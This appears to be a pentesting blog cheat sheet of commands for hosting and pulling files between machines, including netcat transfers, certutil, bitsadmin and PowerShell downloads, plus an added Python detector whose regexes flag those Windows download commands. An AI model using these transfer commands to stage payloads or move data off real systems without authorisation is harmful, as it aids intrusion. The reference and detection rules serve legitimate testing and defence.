File transfer cheatsheet for pentesters

This file transfer cheatsheet for pentesters covers the most common ways to send files between machines during engagements.

Hosting Files

Files can be hosted using methods such as web servers, FTP, SMB, etc. The cheat sheet below provides some of the most common techniques that can be used to host files:

| Command | Description |
| --- | --- |
| `python -m SimpleHTTPServer [PORT]`<br>`python3 -m http.server [PORT]` | Python HTTP server modules |
| `service apache2 start; systemctl start apache2` | Apache web server; files must be placed in the `/var/www/html/` directory |
| `service nginx start; systemctl start nginx` | Nginx web server; files must be placed in `/usr/share/nginx/html` or `/var/www/html` |
| `php -S 0.0.0.0:PORT` | PHP built-in web server |
| `nc -q 0 -lvp 443 < file` | Netcat listener to transfer files |
| `nc -nv IP_ADDR 443 < file` | Netcat command to send files |
| `smbserver.py SHARE share_dir` | Impacket's smbserver.py script simulates an SMB server |
| `service smbd start; systemctl start smbd` | Linux Samba; a share has to be added to `/etc/samba/smb.conf` |
| `service pure-ftpd start; systemctl start pure-ftpd; service proftpd start; systemctl start proftpd` | Services such as pure-ftpd and proftpd can be used to set up FTP servers |
| `atftpd --daemon --port 69 ftp_dir` | The atftpd utility makes it easy to set up a TFTP server |
| `ruby -rwebrick -e 'WEBrick::HTTPServer.new(:Port => PORT, :DocumentRoot => Dir.pwd).start'` | Ruby web server using the WEBrick library |
| `ruby -run -e httpd . -p [PORT]` | Ruby simple HTTP server |
| `cpan HTTP::Server::Brick`<br>`perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>PORT); $s->mount("/"=>{path=>"."}); $s->start'` | Perl Brick HTTP server |
| `"C:\Program Files (x86)\IIS Express\iisexpress.exe" /path:C: /port:PORT` | Microsoft IIS Express |
| `base64 file` | Encoding the file using base64 and decoding it on the target machine |

Downloading Files

Files can be downloaded through the use of various tools such as wget, curl, FTP, SMB, etc. The cheat sheet below provides some of the most common techniques that can be used to download files:

| Command | Description |
| --- | --- |
| `wget http://ip-addr:port/file [-O output_file]` | Wget comes preinstalled with most Linux systems |
| `curl http://ip-addr:port/file -o output_file` | Curl comes preinstalled with most Linux and some Windows systems |
| `certutil -urlcache -split -f "http://ip-addr:port/file" output_file` | Certutil is a Windows built-in command-line tool |
| `powershell -c Invoke-WebRequest -Uri http://ip-addr:port/file -OutFile output_file`<br>`powershell -c (New-Object Net.WebClient).DownloadFile('http://ip-addr:port/file', 'output_file')` | PowerShell Invoke-WebRequest cmdlet or the System.Net.WebClient class |
| `bitsadmin /transfer job /download /priority high http://IP_ADDR/file output_file` | Bitsadmin Windows command-line tool |
| `nc -nv IP_ADDR 443 > file` | Netcat command to download files from a Netcat listener |
| `nc -q 0 -lvp 443 > file` | Netcat listener to receive files |
| `copy \\IP_ADDR\SHARE\output_file` | Copy command to download files from an SMB share |
| `smbget smb://domain;user[:password@]server/share/path/file` | smbget utility to download files from a Samba share |
| `wget ftp://user:password@IP_ADDR/path/file -O output_file`<br>`echo open 192.168.1.64 21> ftp.txt`<br>`echo anonymous>> ftp.txt`<br>`echo [email protected]>> ftp.txt`<br>`echo bin >> ftp.txt`<br>`echo get test.txt >> ftp.txt`<br>`echo bye >> ftp.txt`<br>`ftp -s:ftp.txt` | Wget and FTP to download files from an FTP server |
| `tftp -i IP_ADDR GET file`<br>`tftp -i IP_ADDR PUT file` | tftp client |
| `scp /path/file user@IP_ADDR:/path/file` | Secure File Copy SSH tool |
| https://gist.github.com/Richienb/51021a1c16995a07478dfa20a6db725c | Windows Visual Basic scripts |
| `php -r "file_put_contents('output_file', fopen('http://ip-addr:port/file', 'r'));"` | PHP file_put_contents function |
| `python -c 'from urllib import urlretrieve; urlretrieve("http://ip-addr:port/file", "output_file")'`<br>`python3 -c 'from urllib.request import urlretrieve; urlretrieve("http://ip-addr:port/file", "output_file")'` | The Python urlretrieve function, which is part of the urllib library, can be used to download files |
| `perl -MLWP::Simple -e 'getstore("http://IP_ADDR/file", "out_file")'`<br>`perl -e 'use LWP::Simple; getstore("http://IP_ADDR/file", "out_file")'` | Library for WWW in Perl |
| `ruby -e 'require "open-uri"; File.binwrite("output_file", URI.open("http://ip-addr:port/file").read)'` | Ruby Open-URI library |
| `echo -n "base64-output" > file.b64; base64 -d file.b64 > file` | Decoding the base64 output of the file |
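
On the defending side, the Windows built-ins in this table (certutil, bitsadmin, PowerShell, `ftp -s:`, `tftp -i`) leave recognisable process command lines. The following is an added example, not part of the original cheat sheet: a small Python matcher run over constructed command-line log entries. The rule names, the sample lines and the 192.0.2.10 address are assumptions made for illustration.

```python
import re

# Rules for the Windows built-in download commands from the table above.
# Matching is case-insensitive; certutil accepts "-" or "/" before a switch.
RULES = [
    ("certutil-urlcache", r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*https?://"),
    ("bitsadmin-transfer", r"\bbitsadmin(\.exe)?\b.*/transfer\b.*https?://"),
    # "iwr" is a built-in alias of Invoke-WebRequest
    ("powershell-webrequest", r"\bpowershell(\.exe)?\b.*\b(Invoke-WebRequest|iwr)\b"),
    ("powershell-webclient", r"\bpowershell(\.exe)?\b.*Net\.WebClient\b.*\.DownloadFile\b"),
    ("ftp-script", r"\bftp(\.exe)?\s+(.*\s)?-s:\S+"),
    ("tftp-binary", r"\btftp(\.exe)?\s+-i\s+\S+\s+(get|put)\b"),
]
COMPILED = [(name, re.compile(rx, re.I)) for name, rx in RULES]
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)

def classify(cmdline):
    """Return (rule_name, url_or_None) for the first matching rule, else None."""
    for name, rx in COMPILED:
        if rx.search(cmdline):
            url = URL_RE.search(cmdline)
            return name, (url.group(0) if url else None)
    return None

def scan(cmdlines):
    """Return (rule_name, url, cmdline) for every command line that matches."""
    hits = []
    for line in cmdlines:
        result = classify(line)
        if result:
            hits.append((result[0], result[1], line))
    return hits

# Constructed sample of process-creation command lines (not real telemetry).
SAMPLE = [
    'certutil -urlcache -split -f "http://192.0.2.10:8000/file" output_file',
    r"CertUtil.exe /URLCache /f http://192.0.2.10/a.bin C:\Temp\a.bin",
    "certutil -hashfile setup.exe SHA256",              # benign: no download switch
    r"bitsadmin /transfer job /download /priority high http://192.0.2.10/file C:\Temp\file",
    "powershell -c (New-Object Net.WebClient).DownloadFile('http://192.0.2.10:8000/file', 'output_file')",
    r"powershell -c Get-ChildItem C:\Users",            # benign: no web cmdlet
    "ftp -s:ftp.txt",
    "tftp -i 192.0.2.10 GET file",
    "echo bye >> ftp.txt",                              # benign: only names the script
]

if __name__ == "__main__":
    for rule, url, line in scan(SAMPLE):
        print(f"{rule:22} {url or '-':32} {line}")
```

The extracted URL gives the destination host to check against known update servers or internal mirrors before a hit is escalated.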

We have added the most common ways to transfer files. However, we highly encourage you to research this topic further and learn other possible ways too. Also, comment below if you have any useful technique for transferring files from Linux to Linux, Windows to Windows, or Linux to Windows machines.
